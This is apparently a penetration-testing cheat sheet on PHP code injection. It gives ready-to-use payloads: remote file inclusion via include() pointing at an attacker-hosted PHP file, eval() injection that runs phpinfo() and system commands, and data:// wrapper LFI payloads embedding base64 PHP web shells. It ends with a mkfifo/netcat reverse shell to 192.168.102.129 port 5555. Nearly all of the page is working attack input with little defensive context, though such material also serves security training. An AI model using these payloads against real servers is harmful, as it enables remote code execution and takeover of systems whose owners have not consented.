💰Code Injection (RCE)
Scenario 1: PHP include() function
In this scenario, the PHP include() function is in use with no input validation.
http://vulnerable-site.com/?path=support.phpTo exploit the vulnerability, we will be storing our payload in an external server to call the external file and execute on the vulnerable server:
http://vulnerable-site.com/?path=http://attacker-website/paylaod.php----------------------------------------------------------------
Scenario 2: PHP eval() function
In this example, the vulnerable PHP eval() function is in use which provides a quick and convenient way of executing string values as PHP code, especially in the initial phases of development or for debugging which will cause the code injection. The source code looks like the following:
<?php eval ("echo ".$_REQUEST["parameter"].";"); ?>The parameter is being passed to the URL as the following:
http://vulnerable-site.com/?parameter=valueAn attacker who is aware of eval() function in use (can be revealed via error messages) can send the following payload to exploit the vulnerability:
http://vulnerable-site.com/?parameter=value;phpinfo();If successful, phpinfo() will be executed after ‘echo’ing the parameter value and will provide information about the configuration details.
Moreover, in case system() function is also enabled, this can allow the attacker to execute arbitrary commands as below:
http://vulnerable-site.com/?parameter=value;system('ls -l');----------------------------------------------------------------
RCE (Reverse shell) by Using PHP Data Wrapper in LFI Path: File=
data://text/plain;base64,<?php system($_GET['cmd']);echo 'Shell Executed Successfully!!!'; ?>data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgRXhlY3V0ZWQgU3VjY2Vzc2Z1bGx5ISEhJzsgPz4=data://text/plain;base64,<?php system($_GET['cmd']);?>cmd=lsdata://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=cmd=lsdata://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bin/sh -i 2>&1|nc 192.168.102.129 5555 >/tmp/f-------------------------------------------------------------
Last updated